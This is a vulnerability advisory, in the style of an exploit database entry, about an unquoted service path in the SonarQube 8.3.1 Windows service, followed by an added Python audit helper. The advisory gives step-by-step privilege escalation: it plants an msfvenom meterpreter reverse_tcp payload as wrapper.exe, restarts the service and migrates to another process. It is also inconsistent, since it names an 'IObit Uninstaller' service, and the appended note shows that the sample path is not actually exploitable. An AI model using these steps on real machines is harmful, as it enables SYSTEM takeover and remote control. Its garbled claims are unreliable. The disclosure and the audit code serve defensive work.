# Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path
# Author: Velayutham Selvaraj
# Date: 2020-06-03
# Vendor Homepage: https://www.sonarqube.org
# Software Link: https://www.sonarqube.org/downloads/
# Version : 8.3.1
# Tested on: Windows 10 64bit(EN)

About Unquoted Service Path :
==============================

When a service is created whose executable path contains spaces and isn't enclosed within quotes, it leads to a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level, which most of the time it is).

Steps to recreate :
=============================

1. Open CMD and check for the USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc SonarQube]
4. The command would return:

C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SonarQube
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SonarQube
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
6. Now create a payload with msfvenom or other tools and name it wrapper.exe
7. Make sure you have write permissions to where you downloaded. I kept it in downloads folders but confirmed it in program files as well.
8. Provided that you have the right permissions, drop the wrapper.exe executable you created into the "C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\" directory.
9. Now restart the IObit Uninstaller service by giving the command [ sc stop SonarQube] followed by [ sc start SonarQube]
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM privilege].

During my testing :

Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
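
The following audit helper is an added example, not code from the advisory or from SonarQube. It parses `sc qc` output, separates spaces inside the image path from spaces that only precede arguments, lists the earlier paths Windows would try for an unquoted image path (their parent directories need admin-only write ACLs), and produces the quoted value to set instead. The function names, the sample service `ExampleSvc` and the ".exe ends the image path" heuristic are assumptions.

```python
import ntpath
import re

# Constructed `sc qc` output for a hypothetical service (not taken from the advisory).
SAMPLE_SC_QC = r"""
SERVICE_NAME: ExampleSvc
        BINARY_PATH_NAME   : C:\Program Files\Example App\bin\svc.exe -k run
        SERVICE_START_NAME : LocalSystem
"""

# Heuristic (assumption): the image path ends at the first ".exe" followed by
# whitespace or end of string; everything after it is arguments.
EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)(.*)$", re.IGNORECASE)


def parse_sc_qc(text):
    """Return the 'KEY : value' fields of `sc qc` output as a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip():
            fields[key.strip()] = value.strip()
    return fields


def audit_image_path(image_path):
    """Classify one BINARY_PATH_NAME; list paths Windows tries before the real image."""
    path = image_path.strip()
    if path.startswith('"'):
        return {"quoted": True, "exe": path[1:].split('"', 1)[0],
                "earlier_candidates": [], "fixed": path}
    match = EXE_RE.match(path)
    exe, args = (match.group(1), match.group(2)) if match else (path, "")
    candidates = []
    for i, ch in enumerate(exe):
        if ch == " ":  # every space inside the image path is a split point
            prefix = exe[:i]
            # Windows appends ".exe" when the truncated name has no extension.
            candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return {"quoted": False, "exe": exe, "earlier_candidates": candidates,
            "fixed": f'"{exe}"{args}'}


def audit_service(sc_qc_text):
    """Audit a whole `sc qc` dump; also report the account the service runs as."""
    fields = parse_sc_qc(sc_qc_text)
    report = audit_image_path(fields.get("BINARY_PATH_NAME", ""))
    report["runs_as"] = fields.get("SERVICE_START_NAME", "")
    return report
```

For the BINARY_PATH_NAME shown in step 4, `audit_image_path` returns no earlier candidates, because the only spaces in that value separate `wrapper.exe` from its arguments. For that installation the control to verify is therefore the write ACL on the `bin\windows-x86-64` directory, in addition to quoting the path.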